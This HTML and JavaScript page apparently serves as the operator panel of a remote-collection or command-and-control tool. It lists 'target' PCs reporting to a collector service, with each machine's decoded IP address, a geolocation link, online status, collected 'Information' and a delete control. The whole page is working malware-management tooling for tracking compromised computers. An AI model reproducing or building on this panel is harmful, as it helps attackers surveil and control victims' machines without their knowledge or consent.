<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Target Lists</title>
    <script src="lib\jquery-3.1.0.min.js"></script>
    <script src="lib\encript.js"></script>
    <script src="lib\common.js"></script>
    <style type="text/css">
    a.button {
        -webkit-appearance: button;
        -moz-appearance: button;
        appearance: button;

        padding: 5px 5px 5px 5px;
        text-decoration: none;
        color: initial;
    }
    </style>

    <script>
    $(document).ready(function() {
        $('#TargetLists').text("Target Lists of " + dataDecode(getQueryString["user"]));
        listOfClient();
    });

    var count = 0;
    function listOfClient() {
        $.getJSON(domain + "service.php?cmd=listOfClient&user=" + encodeURIComponent(getQueryString["user"]), function(obj) {
            $('#counts').html("<center>Listed PC count = " + obj.length + "</cetner>");
            $.each(obj, function(key, value) {
                count++;
                $('#lists').append("<tr><td align=center><a href=\"collector-view.html?user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + value.client +"\" class=\"button\">" + dataBase64Decode(value.IP) +"</a><br><a href=\"http://ip-api.com/#" + dataBase64Decode(value.IP) + "\" target=_blank>Geolocation</a></td><td align=center><font color=" + (value.online==="Yes"?"green":"red") + ">" + value.time + "</font></td><td align=left><pre>" + dataDecode(value.Information) + "</pre></td><td align=center><button id=\""+ value.client + "\" onclick=\"deleteClient();\">Delete</button></td></tr>");
            });
         
        })
        .done(function() {
            //
        })
    }

    function deleteClient() {
        var e = window.event;
        btn = e.target || e.srcElement;
        $.getJSON(domain + "service.php?cmd=deleteClient&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(btn.id), function(obj) {
            $.each(obj, function(key, value) {
                if (value == 1) // true
                    window.location.reload(true);
                else
                    debugConsole("Fail : Delete the client");
            });
        })
    }
    </script>
</head>
<body>
    <center>
    <h1 id="TargetLists"></h1>
    <table width=50% border=0>
    <tr>
    <td width="50%" align="middle"><a href="collector.html">Back to ID Lists</a></td>
    <td width="50%" align="middle"><a href="javascript:window.location.reload(true)">Reload</a></td>
    </tr>
    </table>
    </center>
    <hr noshade size=1>
    <font size=5> Available clients reloaded before 
    <span id="timer"></span></font>
    </form>
    <table width="100%"" border="1" id="lists">
    <tr>
    <td align=middle><b>IP</b></td>
    <td align=middle><b>Last connection</b></td>
    <td align=middle><b>Information</b></td>
    <td align=middle><b>Remove</b></td>
    </tr>
    </table>
    <br><h1 id="counts"></h1>
</body>
</html>